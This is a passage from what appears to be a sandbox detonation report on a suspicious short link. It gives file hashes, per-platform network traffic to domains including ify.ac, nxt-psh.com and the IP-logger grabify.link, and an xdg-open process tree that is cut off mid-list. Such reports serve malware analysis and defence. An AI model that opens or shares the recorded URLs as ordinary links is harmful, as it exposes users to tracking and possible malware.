| MD5 | 126c57b5b9b3c8aa11ece82c6acb3807 |
| SHA1 | c43613595aa4fc41fa7cd856ea720d214ba7da0b |
| SHA256 | aa623e6111246c8055ce6a28dd3b803dd831466f26ed52f84048267e9d3ae0c8 |
| SHA512 | 4df60dd70a74cafb1db0d8cbaea75c33a9ef9f595a190ff9d121e75700623dff0103ec3ce820418f58260377d5c8a4b4b110e4762df96905da43f1b65a0dc814 |
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json
| MD5 | 27c0e20c0cb99d25d62a9b81a58bf5ab |
| SHA1 | ed79bca3153fb6dd90b5cf76b4bd271619331853 |
| SHA256 | 02619c8870e87200f2bf3b791ec73011acd4c2f505f31e93d11b45c0472b6d79 |
| SHA512 | 3410507ce19d08bab1f58aab02c0ec10a7ec218a36c53667c284f87bacc8da72a9317be8c7d55a774acb11bce347858fd413a9fe477a941e66fb35abbd10244b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 94dc3d0035aea7219f2e94e090d4914c |
| SHA1 | a9300d8bfa0f57ba1c38debdea6c27ae90728117 |
| SHA256 | d73540906507295f45957329d249636ceb37b26910a066361e998ced868c453f |
| SHA512 | 2e605f6ab4ac250d6dd04f8101fe74c92f72ff324c48873fac79d97f7e8d6cc02d38488de14c139bf44ee84a26db5a5dc21f8a606b7ddd8b958cb2b9b7d64556 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7be433ae9c5fc668f9d2de64e5310486 |
| SHA1 | 17c3a9592953fc07e0b22008bcc020981af7752a |
| SHA256 | bb72c9a9f5ffa3fe673ceed96bdb7c2c8e41514afcf4b478a2998f40c3c297a6 |
| SHA512 | 4e037a0daca2186474ec37f5da04c71fa56549c763d97fa69bca366d492c7bc488f71eac374b2dcbac9b0a845c05411477fa879b4a4bceb8301e043516316ee6 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | a1ecf58e5fe367fc6cd3b017fd366cbc |
| SHA1 | 34a4440c1e2c7bf7b7a47256d60ebd780ec6328c |
| SHA256 | 7159ea13b73be6b4fd50505907ce1717ee89cdbe99c535c10cb5652061f5df05 |
| SHA512 | c0b96508df590660c7880c04b1c14a9318d9cc515462bf149d78d18ed76476dd43e6d22f72596b820612bcf1757196c9ab87982f13cf632ac5a0e7e9a974c555 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\4.jpg
| MD5 | 8581df0cb2dd4fd99e68130cf0344d40 |
| SHA1 | c244ffa9e2f494741a3fda76c26b27d9d3975996 |
| SHA256 | c60eb5d28541aeeb3a1ca66d740d755e1772cb2c2932a8233d5e9de98ddcd0c6 |
| SHA512 | 711e6693ed14d0b945fcfb3da137648fba0562dc4c2a620703dc4da870d4b845ab8572613572b83aeadb5eb887c677b9b5790d9da1569d29f8dea1d18ec48be2 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\3.jpg
| MD5 | 42b3e5c957c3ba04382438ba279c581f |
| SHA1 | 0fcf24c765c782b345ef174b22b34d6e7182a311 |
| SHA256 | 5e8fd959db0e82f76d1064fa9492f1d52bf3dacd278afc9af84def21eb5135a8 |
| SHA512 | 97cf64239c6f2f184077127582f148b9d526739e63274fbcf0d4cb3e8c51c1936cee5946f7db2ec1442f85cfd1a3850fa57c62d76a3e62ed954b6d083bb8912e |
C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg
| MD5 | 73dac907945461f260d6bdaaada5599b |
| SHA1 | 61fd3b5cd5c0e7a3236b280052e218d03605672a |
| SHA256 | aae766cedcc323ae0bd4a0d2af7e4e9710501875970ebcb032bd5b348b332285 |
| SHA512 | 2bcc21fc154e047310d1ca96a576fb26b254777c116b9df6b063feb02420dd76448a565b6f5b7351319422b115061e379078dba3571e7a52beff316e6b9810b4 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg
| MD5 | 1a82c5b4b3d31b3577b0ff62731d44aa |
| SHA1 | beb54239be96ba605bc9d4b3a0ed5da0790e56f8 |
| SHA256 | e909b0b78efc5fb1cbc107acdc079866f690e9acad13365f7ca0f6f2b9de087a |
| SHA512 | e7ea5ee0cd3550846689bd368ef3fd25e2afb3f827d7ba12431c151d564770e2eb6979d72a77ea7061c461aadf098a1388b1c5492fea3097c60b6458a85926e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b374a552097b900a2297f25ac68172da |
| SHA1 | bbe592e4ab2a07cc4c660a9979b28e90a0457e4d |
| SHA256 | fc6f9b916c6c692e45250d291dd3b77201bf19dddebeba314df6bb0fbc45c986 |
| SHA512 | 84feb5fd3317d9bb665c7dfdb600828d7f1d7d7e6fbc2dd51d7e69c582692c1366805274ef4242d7aa54be83a46125cf044f81d592a51473b112921fd7f8ee33 |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | a426780f966999f1ce36c1b74bd83bc1 |
| SHA1 | 2d8c0d06bbcf441f1bcf4e425af4bf6b00925e96 |
| SHA256 | f6e2baebe047877994f8b946658bef298abf552b85ea1bbf4cde44fe4a4b94aa |
| SHA512 | dc275e303504d555f5c3074ddc6d55a9bc253aa68d261d5c3b3f2f86ce41b8eb87c1dd57423ced7117559acd3530b2575f7d9f286e0b6b7b49a6487930db4062 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 59dcf25110e14dcbcacfbbfe5964b0b1 |
| SHA1 | 7d7e26de515708632500154bbf655c5c53d6ca5a |
| SHA256 | e05b6cd48eaf4354f15a99dcb692481294a3fed17ae28badb94cd2ea6e6b2d3c |
| SHA512 | 325f154de187a8f3608c44486de324919f2669cf660073144133b8b3ae061118ff17761055a5febbbf1f703028d1988ee0c5f265f2cf46db37b4871078c6707f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 96ed424e04609ea2059d93a383cba933 |
| SHA1 | 6f4084e2f80a980ccdac4d39c511e83f07ccc635 |
| SHA256 | d6e848c5fd92f4624da3fd748e559236cbd7d9f917be679de187b3b377b6033a |
| SHA512 | d1c9b1940536962cc623b25451458358af63331ffaf2f233e761fb75cc8a7223238c0dbe310ea43b5af91d91861a1dc6457270456ee3106d05b846d17060ae3c |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | 931f583bd9c4c2c7b33fa27f3a9ecf5f |
| SHA1 | 6889204bbd08f25c336be570ef058d082ae88506 |
| SHA256 | 93d375ebce4bcb217172427b07e750e0faf1f52b1e1e505ac6eb10ed7c0b2c65 |
| SHA512 | c0d5156301fb88625f572b7c0a55391840d8e0bfe411adb2b0ad368191c5ebfc0022f9ad7864b68c9f78c1138331cc7e08d1cb39e52d0c9cc0b4b8fbbd802bcd |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | c8d8a6cdd841764d6c11b7117772d6e2 |
| SHA1 | ab44db61d9a227c1e4c6dd8619cd71028022f015 |
| SHA256 | 7a5306d8fc23a1becaaf3dd6cff96e0d6ca02f1f3e6271d095d4b2bcd2e4365b |
| SHA512 | 821b7ba396ac7e2bee814df9deb6dd1ef1f8b0ca2ea26de6cf70e652ac687febff3f69572f83aea9fb4ba89584dc4edc65336e1b726bdfb5d58c81da0567a5a9 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg
| MD5 | b409eb53a23c59f4188dacfe203658c5 |
| SHA1 | 3e5f65966d1d57fed65b65f98d24cee0ac927ae9 |
| SHA256 | c2da8c9f29adf6e40f07c83b8dd17cff79ee26ce782de5f848c59d72a622217e |
| SHA512 | d03641948091ea4cb5a1975a270bf89ca3f6fa9604dbd9782afe2f6e250991acff83a4a9ea05b326321ac7eb3d244e887f1f4349a5592dd99d7e61310867ff3e |
C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg
| MD5 | c3f16c9b6e2ac7dc1efb60db6035dfc2 |
| SHA1 | e3938e8e14d0be4c091dc936127f36270f4e333e |
| SHA256 | 75992fe8fe75eb2a81531bc4e8aacbf83873f85d193f19df282b4e81bd940530 |
| SHA512 | 90a9df6969182e17ea2a35e373e849ba76ad24629e19868488935399c5caca706553405f336fbc7b3e23aeb0d2bd64de120916e7b56e2241173ac6b7248cd46a |
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:19
Platform
android-x64-20240624-en
Max time kernel
376s
Max time network
449s
Command Line
Signatures
Checks CPU information
| Description | Indicator | Process | Target |
| File opened for read | /proc/cpuinfo | N/A | N/A |
Checks memory information
| Description | Indicator | Process | Target |
| File opened for read | /proc/meminfo | N/A | N/A |
Processes
com.android.chrome
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | accounts.google.com | udp |
| GB | 74.125.71.84:443 | accounts.google.com | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 1.1.1.1:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| US | 1.1.1.1:53 | ssl.google-analytics.com | udp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | tcp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| GB | 142.250.187.232:443 | ssl.google-analytics.com | tcp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| US | 1.1.1.1:53 | update.googleapis.com | udp |
| GB | 142.250.180.3:443 | update.googleapis.com | tcp |
| GB | 142.250.187.206:443 | tcp | |
| US | 1.1.1.1:53 | android.apis.google.com | udp |
| GB | 142.250.187.206:443 | android.apis.google.com | tcp |
| US | 1.1.1.1:53 | fcmregistrations.googleapis.com | udp |
| GB | 216.58.201.100:443 | tcp | |
| GB | 216.58.201.100:443 | tcp | |
| GB | 142.250.180.3:443 | update.googleapis.com | tcp |
| GB | 216.58.201.98:443 | tcp | |
| GB | 142.250.180.3:443 | update.googleapis.com | tcp |
| US | 1.1.1.1:53 | update.googleapis.com | udp |
| US | 1.1.1.1:53 | update.googleapis.com | udp |
| GB | 216.58.213.3:443 | update.googleapis.com | tcp |
| GB | 216.58.213.3:443 | update.googleapis.com | tcp |
| GB | 172.217.16.238:443 | tcp | |
| GB | 216.58.212.234:443 | fcmregistrations.googleapis.com | tcp |
Files
files/dom-0.html
| MD5 | 08ed7cb5e9a90fb317196d7b529b6432 |
| SHA1 | 805f4d04ccfdbb9bd8548f2a2d9f50cd45d4b7aa |
| SHA256 | b2215db9744c9bc33083b3005acd7c645d1f4898a7ff200cbdfd7aa1bf8c866d |
| SHA512 | 6269167654f1dc64a26a4aaea315ed157fb9e43305811d2504986db5373efc7c6114a97eaa0980492cecc86b232546be6ed6dbab45d56e3511b99f857c497e95 |
files/dom-1.html
| MD5 | 601c97f7982d135d82529b0c98742f01 |
| SHA1 | 626fbcd25cb5f360862ab4ba7fa2008c2d6bb10e |
| SHA256 | 78da5bcb6c7e2276ed36abf186d0e5e6a826cbcbf416385cf15902819d3d4954 |
| SHA512 | 9c34171d609fb844720afb9dfaf4842431f7fbdbc41668dcbdea452c2338db2d5b79a6d4a9112657f08cdf694caf30f298b5cc3cee6c9aa9659f465af241a8c5 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:19
Platform
android-x64-arm64-20240624-en
Max time kernel
469s
Max time network
484s
Command Line
Signatures
Checks CPU information
| Description | Indicator | Process | Target |
| File opened for read | /proc/cpuinfo | N/A | N/A |
Checks memory information
| Description | Indicator | Process | Target |
| File opened for read | /proc/meminfo | N/A | N/A |
Processes
com.android.chrome
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.206:443 | tcp | |
| GB | 142.250.187.206:443 | tcp | |
| US | 1.1.1.1:53 | android.apis.google.com | udp |
| GB | 142.250.178.14:443 | android.apis.google.com | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | accounts.google.com | udp |
| US | 1.1.1.1:53 | accounts.google.com | udp |
| US | 1.1.1.1:53 | ify.ac | udp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 1.1.1.1:53 | ssl.google-analytics.com | udp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| GB | 172.217.169.40:443 | ssl.google-analytics.com | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | update.googleapis.com | udp |
| US | 1.1.1.1:53 | fcmregistrations.googleapis.com | udp |
| GB | 216.58.213.10:443 | fcmregistrations.googleapis.com | tcp |
| GB | 142.250.179.228:443 | tcp | |
| GB | 142.250.179.228:443 | tcp | |
| US | 172.67.194.119:443 | nxt-psh.com | tcp |
| US | 1.1.1.1:53 | clck.ru | udp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| RU | 213.180.193.232:443 | sba.yandex.ru | tcp |
| RU | 213.180.193.232:443 | sba.yandex.ru | tcp |
| US | 1.1.1.1:53 | grabify.link | udp |
| US | 1.1.1.1:53 | grabify.link | udp |
| US | 172.67.68.246:443 | grabify.link | tcp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 1.1.1.1:53 | cfl.dropboxstatic.com | udp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 1.1.1.1:53 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | udp |
| GB | 162.125.64.16:443 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | tcp |
| GB | 162.125.64.16:443 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | tcp |
| US | 1.1.1.1:53 | fp.dropbox.com | udp |
| GB | 108.138.217.54:443 | fp.dropbox.com | tcp |
| GB | 108.138.217.54:443 | fp.dropbox.com | tcp |
| US | 1.1.1.1:53 | update.googleapis.com | udp |
| US | 1.1.1.1:53 | use1-turn.fpjs.io | udp |
| GB | 142.250.178.3:443 | update.googleapis.com | tcp |
| US | 1.1.1.1:53 | redirector.gvt1.com | udp |
| US | 1.1.1.1:53 | use1-turn.fpjs.io | udp |
| DE | 18.196.235.131:3478 | use1-turn.fpjs.io | tcp |
| GB | 142.250.179.238:443 | redirector.gvt1.com | tcp |
| US | 1.1.1.1:53 | r3---sn-aigzrnse.gvt1.com | udp |
| GB | 74.125.168.200:443 | r3---sn-aigzrnse.gvt1.com | tcp |
| US | 1.1.1.1:53 | r3---sn-aigzrn7s.gvt1.com | udp |
| GB | 173.194.129.200:443 | r3---sn-aigzrn7s.gvt1.com | tcp |
| US | 1.1.1.1:53 | r4---sn-aigzrn7z.gvt1.com | udp |
| GB | 173.194.135.105:443 | r4---sn-aigzrn7z.gvt1.com | tcp |
| US | 1.1.1.1:53 | r5---sn-aigzrnsl.gvt1.com | udp |
| GB | 74.125.168.234:443 | r5---sn-aigzrnsl.gvt1.com | tcp |
| US | 1.1.1.1:53 | r5---sn-aigzrn7s.gvt1.com | udp |
| GB | 173.194.129.202:443 | r5---sn-aigzrn7s.gvt1.com | tcp |
| US | 1.1.1.1:53 | r5---sn-aigzrnss.gvt1.com | udp |
| GB | 74.125.175.10:443 | r5---sn-aigzrnss.gvt1.com | tcp |
| US | 1.1.1.1:53 | r1---sn-aigzrnse.gvt1.com | udp |
| GB | 74.125.168.198:443 | r1---sn-aigzrnse.gvt1.com | tcp |
| US | 1.1.1.1:53 | r1---sn-aigzrnss.gvt1.com | udp |
| GB | 74.125.175.6:443 | r1---sn-aigzrnss.gvt1.com | tcp |
| US | 1.1.1.1:53 | r2---sn-aigzrn7d.gvt1.com | udp |
| GB | 173.194.138.199:443 | r2---sn-aigzrn7d.gvt1.com | tcp |
| US | 1.1.1.1:53 | r5---sn-aigzrn7e.gvt1.com | udp |
| GB | 173.194.5.42:443 | r5---sn-aigzrn7e.gvt1.com | tcp |
| US | 1.1.1.1:53 | cdn.dropboxexperiment.com | udp |
| GB | 13.224.245.108:443 | cdn.dropboxexperiment.com | tcp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| GB | 142.250.200.34:443 | tcp | |
| GB | 142.250.187.227:443 | tcp | |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
Files
files/dom-0.html
| MD5 | d78a710b9acf0e8d91640cf9b5ed92fb |
| SHA1 | 2e9919502e25e9d1c0ba7810ac2afb5379491d3f |
| SHA256 | be8ae8fc50975e4d720e80e58ca67e12f7f5bf0e45b84bcf473e83b179eb5b91 |
| SHA512 | 121fe103d74a6f86d409f8f73481845cfb043fedac776fda1e94a8c54566eafdeff8a8cf7ba012705aeb5ab84e11f2680402f499280b4606a9e8f7e1eb49767e |
files/dom-1.html
| MD5 | 8b44c0d49afa2ca06bc1b8a2d24523f1 |
| SHA1 | 968059a9676cfaaecec02edc3c177d9c47279a1d |
| SHA256 | a411d971c03db7dde9005aee3a238055b9981c9710cd7d52200b78bba0831703 |
| SHA512 | 2b0863c15a1eaa83cbcb4df35474e4c469d479373031ff532743d83d7bbad9ab86f4585ab4a278db535ec2014cfd97a77b66b242143b972734e866a27db33d30 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:17
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
387s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | pool-spawner | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gmain | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | dconf worker | N/A | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/file | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/mount | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/policy | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/rlimit | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/network_v8 | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/caps | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/domain | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/io_uring | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/ipc | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/namespaces | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/network | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/dbus | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/ptrace | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/query | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/signal | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/lib/snapd/snap-seccomp | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/mounts | /snap/bin/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/cgroups | /snap/bin/firefox | N/A |
| File opened for reading | /proc/cmdline | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/sys/kernel/random/uuid | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gsettings | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/mountinfo | /snap/bin/firefox | N/A |
| File opened for reading | /proc/2555/cgroup | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gsettings | N/A |
| File opened for reading | /proc/sys/kernel/seccomp/actions_avail | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gsettings | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
Processes
/usr/bin/xdg-open
[xdg-open https://ify.ac/1IZk]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/grep
[grep -q ^file://]
/usr/bin/egrep
[egrep -q ^[[:alpha:]+\.\-]+:]
/usr/local/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/local/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/sed
[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/https]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep -l x-scheme-handler/https; /.local/share/applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/https; /usr/local/share//applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/https; /usr/share//applications/apport-gtk.desktop /usr/share//applications/bluetooth-sendto.desktop /usr/share//applications/display-im6.q16.desktop /usr/share//applications/gcr-prompter.desktop /usr/share//applications/gcr-viewer.desktop /usr/share//applications/geoclue-demo-agent.desktop /usr/share//applications/gkbd-keyboard-display.desktop /usr/share//applications/gnome-about-panel.desktop /usr/share//applications/gnome-applications-panel.desktop /usr/share//applications/gnome-background-panel.desktop /usr/share//applications/gnome-bluetooth-panel.desktop /usr/share//applications/gnome-color-panel.desktop /usr/share//applications/gnome-datetime-panel.desktop /usr/share//applications/gnome-disk-image-mounter.desktop /usr/share//applications/gnome-disk-image-writer.desktop /usr/share//applications/gnome-display-panel.desktop /usr/share//applications/gnome-initial-setup.desktop /usr/share//applications/gnome-keyboard-panel.desktop /usr/share//applications/gnome-language-selector.desktop /usr/share//applications/gnome-mouse-panel.desktop /usr/share//applications/gnome-multitasking-panel.desktop /usr/share//applications/gnome-network-panel.desktop /usr/share//applications/gnome-notifications-panel.desktop /usr/share//applications/gnome-online-accounts-panel.desktop /usr/share//applications/gnome-power-panel.desktop /usr/share//applications/gnome-printers-panel.desktop /usr/share//applications/gnome-privacy-panel.desktop /usr/share//applications/gnome-region-panel.desktop /usr/share//applications/gnome-search-panel.desktop /usr/share//applications/gnome-session-properties.desktop /usr/share//applications/gnome-sharing-panel.desktop /usr/share//applications/gnome-sound-panel.desktop /usr/share//applications/gnome-system-monitor-kde.desktop /usr/share//applications/gnome-system-panel.desktop /usr/share//applications/gnome-ubuntu-panel.desktop /usr/share//applications/gnome-universal-access-panel.desktop /usr/share//applications/gnome-users-panel.desktop /usr/share//applications/gnome-wacom-panel.desktop /usr/share//applications/gnome-wifi-panel.desktop /usr/share//applications/gnome-wwan-panel.desktop /usr/share//applications/hplj1020.desktop /usr/share//applications/ibus-setup-table.desktop /usr/share//applications/im-config.desktop /usr/share//applications/io.snapcraft.SessionAgent.desktop /usr/share//applications/libreoffice-calc.desktop 